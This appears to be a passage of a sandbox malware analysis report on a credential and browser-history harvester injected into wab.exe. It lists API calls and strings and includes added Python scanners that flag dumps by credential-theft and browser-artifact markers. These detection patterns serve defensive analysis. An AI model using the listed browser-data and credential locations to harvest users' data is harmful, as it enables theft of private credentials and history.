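ASCII_MARKERS = ["no such vfs: %s", "NOCASE", "RTRIM"]
# Import names that pair with those strings in the listings above.
API_MARKERS = [
    "CredEnumerateW",
    "FindFirstUrlCacheEntryW",
    "FindNextUrlCacheEntryW",
    "EnumProcesses",
    "GetModuleFileNameExW",
]


def find_markers(data: bytes) -> Dict[str, List[str]]:
    """Return, per group, the markers that occur anywhere in `data` (list order preserved)."""
    return {
        "wide": [s for s in WIDE_MARKERS if s.encode("utf-16-le") in data],
        "ascii": [s for s in ASCII_MARKERS if s.encode("ascii") in data],
        "api": [s for s in API_MARKERS if s.encode("ascii") in data],
    }


def is_credential_harvester(hits: Dict[str, List[str]]) -> bool:
    """Assumed decision rule (mine, not the report's): one credential/cache API name
    plus at least two of the browser strings. A single profile path on its own is
    common in legitimate software that reads Firefox settings, so it is not enough."""
    return len(hits["api"]) >= 1 and len(hits["wide"]) >= 2


def scan_file(path: str) -> Tuple[bool, Dict[str, List[str]]]:
    """Scan a file on disk (an unpacked memory dump is the realistic input)."""
    with open(path, "rb") as fh:
        data = fh.read()
    hits = find_markers(data)
    return is_credential_harvester(hits), hits


def _wide(s: str) -> bytes:
    """NUL-terminated UTF-16LE, as the strings appear in the image."""
    return s.encode("utf-16-le") + b"\x00\x00"


# Constructed samples (not real dumps): one mimicking the injected payload, one a
# benign program that merely references the Firefox profile directory.
SAMPLE_HARVESTER = (
    b"MZ\x90\x00" + b"\x00" * 64
    + b"CredEnumerateW\x00FindFirstUrlCacheEntryW\x00LocalFree\x00"
    + _wide("visited:")
    + _wide("Mozilla\\Firefox\\Profiles")
    + _wide("https://login.yahoo.com/config/login")
    + b"no such vfs: %s\x00NOCASE\x00"
)
SAMPLE_BENIGN = (
    b"MZ\x90\x00" + b"\x00" * 64
    + b"RegOpenKeyExW\x00GetPrivateProfileStringW\x00"
    + _wide("Mozilla\\Firefox\\Profiles")
)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        flagged, hits = scan_file(sys.argv[1])
    else:
        hits = find_markers(SAMPLE_HARVESTER)
        flagged = is_credential_harvester(hits)
    print("credential harvester:", flagged)
    for group, names in hits.items():
        for name in names:
            print(f"  [{group}] {name}")
```

Run it with the path of a process memory dump such as the .sdmp file named in the Memory Dump Source lines; the on-disk stages of this chain (the VBScript and the PowerShell loader) are packed and will not contain these strings, so the dump of the injected wab.exe image is the input that matters.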
                      APIs
                      • memset.MSVCRT ref: 0040A824
                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • wcscpy.MSVCRT ref: 0040A854
                      • wcscat.MSVCRT ref: 0040A86A
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 669240632-0
                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                      APIs
                      • wcschr.MSVCRT ref: 00414458
                      • _snwprintf.MSVCRT ref: 0041447D
                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                      • String ID: "%s"
                      • API String ID: 1343145685-3297466227
                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                      APIs
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProcProcessTimes
                      • String ID: GetProcessTimes$kernel32.dll
                      • API String ID: 1714573020-3385500049
                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                      APIs
                      • memset.MSVCRT ref: 004087D6
                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                      • memset.MSVCRT ref: 00408828
                      • memset.MSVCRT ref: 00408840
                      • memset.MSVCRT ref: 00408858
                      • memset.MSVCRT ref: 00408870
                      • memset.MSVCRT ref: 00408888
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                      • String ID:
                      • API String ID: 2911713577-0
                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcmp
                      • String ID: @ $SQLite format 3
                      • API String ID: 1475443563-3708268960
                      • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                      • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                      APIs
                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                      • memset.MSVCRT ref: 00414C87
                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                      Strings
                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressCloseProcVersionmemsetwcscpy
                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                      • API String ID: 2705122986-2036018995
                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmpqsort
                      • String ID: /nosort$/sort
                      • API String ID: 1579243037-1578091866
                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                      APIs
                      • memset.MSVCRT ref: 0040E60F
                      • memset.MSVCRT ref: 0040E629
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Strings
                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                      • API String ID: 3354267031-2114579845
                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                      APIs
                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                      • LockResource.KERNEL32(00000000), ref: 004148EF
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Resource$FindLoadLockSizeof
                      • String ID:
                      • API String ID: 3473537107-0
                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                      APIs
                      Strings
                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: only a single result allowed for a SELECT that is part of an expression
                      • API String ID: 2221118986-1725073988
                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                      APIs
                      • Sleep.KERNEL32(00000064), ref: 004175D0
                      • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ChangeCloseFindNotificationSleep
                      • String ID: }A
                      • API String ID: 1821831730-2138825249
                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@DeleteObject
                      • String ID: r!A
                      • API String ID: 1103273653-628097481
                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@
                      • String ID:
                      • API String ID: 1033339047-0
                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                      APIs
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                      • memcmp.MSVCRT ref: 00444BA5
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$memcmp
                      • String ID: $$8
                      • API String ID: 2808797137-435121686
                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                      APIs
                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                        • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                      • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                        • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                        • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                      • String ID:
                      • API String ID: 1042154641-0
                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                      APIs
                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                      • memset.MSVCRT ref: 00403A55
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                      • String ID: history.dat$places.sqlite
                      • API String ID: 3093078384-467022611
                      • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                      • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                      APIs
                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                      • GetLastError.KERNEL32 ref: 00417627
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ErrorLast$File$PointerRead
                      • String ID:
                      • API String ID: 839530781-0
                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileFindFirst
                      • String ID: *.*$index.dat
                      • API String ID: 1974802433-2863569691
                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
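The records above reference, between them, the Firefox profile directories (Mozilla\Firefox\Profiles, Mozilla\Profiles), the history files places.sqlite and history.dat, the WebCacheV01.dat and WebCacheV24.dat databases and index.dat, the SQLite file header "SQLite format 3" compared with memcmp, the Explorer Shell Folders registry key and the /sort and /nosort switches. Together they are the string footprint of the browser-history harvesting code in the image dumped from the wab process at 0x00400000 (snapshot hcaresult_20_2_400000_wab.jbxd). As an added example, not Joe Sandbox output or code from the sample, the Python below turns that string list into a scanner for a process-memory dump. The category grouping, the verdict rule and the constructed dump excerpts are this example's own; every string is searched in both ASCII and UTF-16LE rather than assuming one width, since the surrounding path handling is wide (wcscpy/wcscat) while the SQLite header check is an ASCII memcmp.

```python
"""Scan a process-memory dump for the browser-artifact strings referenced by
the function records above. Added example, not Joe Sandbox or sample code:
the indicator strings are copied from the 'Strings' / 'String ID' fields of
this report; the category grouping, the verdict rule and the sample dump
bytes are this example's own construction."""

# Every string is searched as ASCII and as UTF-16LE: the path handling around
# them uses wcscpy/wcscat (wide), while "SQLite format 3" is compared with
# memcmp against the ASCII database header, and a dump may hold both forms.
INDICATORS = {
    "firefox_profiles": [r"Mozilla\Firefox\Profiles", r"Mozilla\Profiles",
                         "places.sqlite", "history.dat"],
    "ie_edge_history": [r"Microsoft\Windows\WebCache\WebCacheV01.dat",
                        r"Microsoft\Windows\WebCache\WebCacheV24.dat", "index.dat"],
    "sqlite_magic": ["SQLite format 3"],
    "shell_folders_key": [
        r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"],
    "cli_switches": ["/nosort", "/sort"],
}

def encodings(s):
    return (s.encode("ascii"), s.encode("utf-16-le"))

def scan(dump):
    """Return {category: [matched indicator strings]} for everything found."""
    hits = {}
    for category, strings in INDICATORS.items():
        found = [s for s in strings if any(e in dump for e in encodings(s))]
        if found:
            hits[category] = found
    return hits

def is_browser_history_harvester(hits):
    """Verdict rule (this example's choice): a history-file locator plus either
    the SQLite magic check or the Shell Folders lookup used to find profiles."""
    locator = {"firefox_profiles", "ie_edge_history"} & set(hits)
    reader = {"sqlite_magic", "shell_folders_key"} & set(hits)
    return bool(locator and reader)

# Constructed dump excerpts (not from the report): wide path strings around an
# ASCII SQLite header, and a benign buffer with none of the indicators.
SAMPLE_DUMP = (b"\x00" * 16
               + r"Mozilla\Firefox\Profiles".encode("utf-16-le") + b"\x00\x00"
               + b"SQLite format 3\x00"
               + "places.sqlite".encode("utf-16-le") + b"\x00" * 8)
BENIGN_DUMP = b"MZ\x90\x00" + b"plain text with no browser artefacts " * 4

if __name__ == "__main__":
    for name, dump in (("sample", SAMPLE_DUMP), ("benign", BENIGN_DUMP)):
        hits = scan(dump)
        print(name, is_browser_history_harvester(hits), hits)
```

The same list transcribes directly into a YARA rule with `wide ascii` modifiers; keeping it in Python makes the matching logic visible and testable offline. The /sort and /nosort switches carry the least weight on their own, which is why the verdict requires a locator string together with a reader indicator rather than any single hit.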
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@mallocmemcpy
                      • String ID:
                      • API String ID: 3831604043-0
                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                      APIs
                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                      • GetLastError.KERNEL32 ref: 004175A2
                      • GetLastError.KERNEL32 ref: 004175A8
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
